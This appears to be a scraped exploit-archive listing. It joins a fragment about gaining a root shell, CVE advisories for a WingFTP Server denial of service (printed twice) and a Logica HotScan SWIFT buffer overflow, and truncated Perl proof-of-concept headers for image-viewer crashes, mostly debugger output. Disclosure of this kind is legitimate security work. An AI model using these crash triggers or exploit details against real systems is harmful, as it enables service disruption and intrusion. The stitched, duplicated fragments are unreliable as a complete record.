/etc/abc boom # BOOM! -- BOOM. Now we're able to start an unrestricted root shell and gain control over the file system. (This is still a local exploit because we were only able to exploit that issue remotely by using netcat). /* http://0xffe4.org */
WingFTP Server Denial of Service Vulnerability
-- | WingFTP Server Denial of Service Vulnerability | --- Summary === WingFTP server is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause the service to crash, denying service to legitimate users CVE number: CVE-2012-4729 Impact: High Vendor homepage: http://www.wftpserver.com/serverhistory.htm#gotop Vendor notified: 30/08/2012 Vendor response: Vendor fixed the vulnerability and released the fix. . Affected Products Windows Platforms. Details === It is possible the crash the process by sending two sequential request to zip file option by authenticated users. The output of debugger: (6e4.c4c): C++ EH exception - code e06d7363 (first chance) ( After first request ) eax=026a6b80 ebx=0001 ecx=0004 edx= esi=0001 edi= eip=7c90e514 esp=014ce1cc ebp=014ce1dc iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=0286 ntdll!KiFastSystemCallRet: 7c90e514 c3 ret Impact == Process crashed and the all services down. Solution Issue was fixed on Version 4.1.1 http://www.wftpserver.com/serverhistory.htm#gotop
BufferOverflow Vulnerability on Logica HotScan SWIFT Alliance Access Interface
| BufferOverflow Vulnerability on Logica HotScan SWIFT Alliance Access Interface Summary === Hotscan Listener interface is prone to buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input. This allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted font file CVE number: CVE-2012-2624 Impact: Critical Vendor notified: May 11, 2012 Vendor response: Vendor patched the vulnerability ( June 16, 2012 ) . Affected Products Logica HotScan Interface Details === By sending malicious input to hotscan listener tcp interface, it is possible to overwrite stack only by two bytes. The software compiled with NXCOMPAT,Code execution could not be done. Therefore crash of this service can stop all swift process , this effects the impact of vulnerability. (Register output: ECX 76E801B8 ASCII STATUS_STACK_BUFFER_OVERRUN encountered EDX 0018F325 ASCII 0A,STATUS_STA EBX 0042AEAC HOTS_Rec.0042AEAC ESP 0018F56C EBP 0018F5E8 ESI EDI EIP 76E7FF9A kernel32.76E7FF9A Solution Vendor released a patch to fix the bug.
WingFTP Server Denial of Service Vulnerability
| WingFTP Server Denial of Service Vulnerability| Summary === WingFTP server is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause the service to crash, denying service to legitimate users CVE number: CVE-2012-4729 Impact: High Vendor homepage: http://www.wftpserver.com/serverhistory.htm#gotop Vendor notified: 30/08/2012 Vendor response: Vendor fixed the vulnerability and released the fix. . Affected Products Windows Platforms. Details === It is possible the crash the process by sending two sequential request to zip file option by authenticated users. The output of debugger: (6e4.c4c): C++ EH exception - code e06d7363 (first chance) ( After first request ) eax=026a6b80 ebx=0001 ecx=0004 edx= esi=0001 edi= eip=7c90e514 esp=014ce1cc ebp=014ce1dc iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=0286 ntdll!KiFastSystemCallRet: 7c90e514 c3 ret Impact == Process crashed and the all services down. Solution Issue was fixed on Version 4.1.1 http://www.wftpserver.com/serverhistory.htm#gotop
Hardcoreview WriteAV Arbitrary Code Execution
#!/usr/bin/perl # Hardcoreview WriteAV Arbitrary Code Execution # Author: Jean Pascal Pereira pere...@secbiz.de # Vendor URI: http://sourceforge.net/projects/hardcoreview/ # Vendor Description: # Image browser. Designed and created for profesional and amature watching image files. # All kind of image files ;) . Support *.jpg, *.gif, *.bmp, *.psd, and many more. # Debug info: # Microsoft (R) Windows Debugger Version 6.11.0001.404 X86 # Copyright (c) Microsoft Corporation. All rights reserved. # # CommandLine: C:\Program Files\hardcoreview\hardcoreview.exe C:\research\hcview\crafted.gif # Symbol search path is: *** Invalid *** # # * Symbol loading may be unreliable without a symbol search path. * # * Use .symfix to have the debugger choose a symbol path. * # * After setting your symbol path, use .reload to refresh symbol locations. * # # Executable search path is: # ModLoad: 0040 00443000 hardcoreview.exe # ModLoad: 7c90 7c9b2000 ntdll.dll # ModLoad: 7c80 7c8f6000 C:\WINDOWS\system32\kernel32.dll # ModLoad: 5ed0 5edcc000 C:\WINDOWS\system32\OPENGL32.dll # ModLoad: 77c1 77c68000 C:\WINDOWS\system32\msvcrt.dll # ModLoad: 77dd 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll # ModLoad: 77e7 77f03000 C:\WINDOWS\system32\RPCRT4.dll # ModLoad: 77fe 77ff1000 C:\WINDOWS\system32\Secur32.dll # ModLoad: 77f1 77f59000 C:\WINDOWS\system32\GDI32.dll # ModLoad: 7e41 7e4a1000 C:\WINDOWS\system32\USER32.dll # ModLoad: 68b2 68b4 C:\WINDOWS\system32\GLU32.dll # ModLoad: 7376 737ab000 C:\WINDOWS\system32\DDRAW.dll # ModLoad: 73bc 73bc6000 C:\WINDOWS\system32\DCIMAN32.dll # ModLoad: 1000 102be000 C:\Program Files\hardcoreview\DevIL.dll # ModLoad: 7c42 7c4a7000 C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700\MSVCP80.dll # ModLoad: 7813 781cb000 C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700\MSVCR80.dll # ModLoad: 0035 00365000 C:\Program Files\hardcoreview\ILU.dll # ModLoad: 0038 0038f000 C:\Program Files\hardcoreview\ILUT.dll # ModLoad: 763b 763f9000 C:\WINDOWS\system32\comdlg32.dll # ModLoad: 5d09 5d12a000 C:\WINDOWS\system32\COMCTL32.dll # ModLoad: 7c9c 7d1d7000 C:\WINDOWS\system32\SHELL32.dll # ModLoad: 77f6 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll # ModLoad: 003a 003b5000 C:\Program Files\hardcoreview\pthreadVC2.dll # ModLoad: 71ad 71ad9000 C:\WINDOWS\system32\WSOCK32.dll # ModLoad: 71ab 71ac7000 C:\WINDOWS\system32\WS2_32.dll # ModLoad: 71aa 71aa8000 C:\WINDOWS\system32\WS2HELP.dll # ModLoad: 7848 7850e000 C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_6f74963e\MSVCP90.dll # ModLoad: 7852 785c3000 C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_6f74963e\MSVCR90.dll # (e4c.8c8): Break instruction exception - code 8003 (first chance) # ModLoad: 7639 763ad000 C:\WINDOWS\system32\IMM32.DLL # ModLoad: 773d 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll # ModLoad: 5ad7 5ada8000 C:\WINDOWS\system32\uxtheme.dll # ModLoad: 7472 7476c000 C:\WINDOWS\system32\MSCTF.dll # ModLoad: 77c0 77c08000 C:\WINDOWS\system32\version.dll # ModLoad: 755c 755ee000 C:\WINDOWS\system32\msctfime.ime # ModLoad: 774e 7761e000 C:\WINDOWS\system32\ole32.dll # ModLoad: 0162 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 0172 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 61dd 61dd6000 C:\WINDOWS\system32\MCD32.DLL # ModLoad: 0162 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 0172 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 0162 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 0172 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 0162 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 0172 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 0162 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 0172 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 0162 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 0172 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 0162 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 0172 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 0162 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 0172 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 0162 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 0172 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 0162 0171d000 C:\WINDOWS\system32\VBoxOGL.dll #
FastStone Image Viewer 4.6 = ReadAVonIP Arbitrary Code Execution
#!/usr/bin/perl # FastStone Image Viewer 4.6 = ReadAVonIP Arbitrary Code Execution # Author: Jean Pascal Pereira pere...@secbiz.de # Vendor URI: http://www.faststone.org # Vendor Description: # An image browser, converter and editor that supports all major graphic formats including BMP, JPEG, JPEG 2000, # GIF, PNG, PCX, TIFF, WMF, ICO, TGA and camera raw files. It has a nice array of features such as image viewing, # management, comparison, red-eye removal, emailing, resizing, cropping, color adjustments, musical slideshow and much more. # Debug info: # Microsoft (R) Windows Debugger Version 6.11.0001.404 X86 # Copyright (c) Microsoft Corporation. All rights reserved. # CommandLine: C:\Program Files\FastStone Image Viewer\FSViewer.exe C:\research\fsview\crafted.gif # Symbol search path is: *** Invalid *** # # * Symbol loading may be unreliable without a symbol search path. * # * Use .symfix to have the debugger choose a symbol path. * # * After setting your symbol path, use .reload to refresh symbol locations. * # # Executable search path is: # ModLoad: 0040 00a5a000 image0040 # ModLoad: 7c90 7c9b2000 ntdll.dll # ModLoad: 7c80 7c8f6000 C:\WINDOWS\system32\kernel32.dll # ModLoad: 77dd 77e6b000 C:\WINDOWS\system32\advapi32.dll # ModLoad: 77e7 77f03000 C:\WINDOWS\system32\RPCRT4.dll # ModLoad: 77fe 77ff1000 C:\WINDOWS\system32\Secur32.dll # ModLoad: 73b5 73b67000 C:\WINDOWS\system32\avifil32.dll # ModLoad: 77c1 77c68000 C:\WINDOWS\system32\msvcrt.dll # ModLoad: 7e41 7e4a1000 C:\WINDOWS\system32\USER32.dll # ModLoad: 77f1 77f59000 C:\WINDOWS\system32\GDI32.dll # ModLoad: 76b4 76b6d000 C:\WINDOWS\system32\WINMM.dll # ModLoad: 774e 7761e000 C:\WINDOWS\system32\ole32.dll # ModLoad: 77be 77bf5000 C:\WINDOWS\system32\MSACM32.dll # ModLoad: 75a7 75a91000 C:\WINDOWS\system32\MSVFW32.dll # ModLoad: 7c9c 7d1d7000 C:\WINDOWS\system32\SHELL32.dll # ModLoad: 77f6 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll # ModLoad: 773d 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\COMCTL32.dll # ModLoad: 763b 763f9000 C:\WINDOWS\system32\comdlg32.dll # ModLoad: 7712 771ab000 C:\WINDOWS\system32\oleaut32.dll # ModLoad: 7481 7497e000 C:\WINDOWS\system32\quartz.dll # ModLoad: 77c0 77c08000 C:\WINDOWS\system32\version.dll # ModLoad: 7300 73026000 C:\WINDOWS\system32\winspool.drv # (dd8.ef4): Break instruction exception - code 8003 (first chance) # ModLoad: 7639 763ad000 C:\WINDOWS\system32\IMM32.DLL # ModLoad: 5ad7 5ada8000 C:\WINDOWS\system32\uxtheme.dll # ModLoad: 7472 7476c000 C:\WINDOWS\system32\MSCTF.dll # ModLoad: 755c 755ee000 C:\WINDOWS\system32\msctfime.ime # ModLoad: 5edd 5ede7000 C:\WINDOWS\system32\olepro32.dll # ModLoad: 7792 77a13000 C:\WINDOWS\system32\SETUPAPI.dll # ModLoad: 7699 769b5000 C:\WINDOWS\system32\ntshrui.dll # ModLoad: 76b2 76b31000 C:\WINDOWS\system32\ATL.DLL # ModLoad: 5b86 5b8b5000 C:\WINDOWS\system32\NETAPI32.dll # ModLoad: 769c 76a74000 C:\WINDOWS\system32\USERENV.dll # ModLoad: 73bc 73bc6000 C:\WINDOWS\system32\DCIMAN32.DLL # ModLoad: 77b4 77b62000 C:\WINDOWS\system32\appHelp.dll # ModLoad: 76fd 7704f000 C:\WINDOWS\system32\CLBCATQ.DLL # ModLoad: 7705 77115000 C:\WINDOWS\system32\COMRes.dll # ModLoad: 77a2 77a74000 C:\WINDOWS\System32\cscui.dll # ModLoad: 7660 7661d000 C:\WINDOWS\System32\CSCDLL.dll # ModLoad: 76bf 76bfb000 C:\WINDOWS\system32\psapi.dll # ModLoad: 75f8 7607d000 C:\WINDOWS\system32\browseui.dll # (dd8.ef4): Access violation - code c005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=320e ebx=007fcdf2 ecx=0012c000 edx=0013 esi=0011f7b8 edi= # eip=007cdea2 esp=0011f750 ebp=0011f770 iopl=0 nv up ei pl zr na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010246 # *** WARNING: Unable to verify checksum for image0040 # *** ERROR: Module load completed but symbols could not be loaded for image0040 # image0040+0x3cdea2: # 007cdea2 893amov dword ptr [edx],edi ds:0023:0013=78746341 # 0:000 g;g;r;!exploitable -v;q # (dd8.ef4): Access violation - code c005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # (dd8.ef4): Access violation - code c005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax= ebx= ecx= edx=7c9032bc
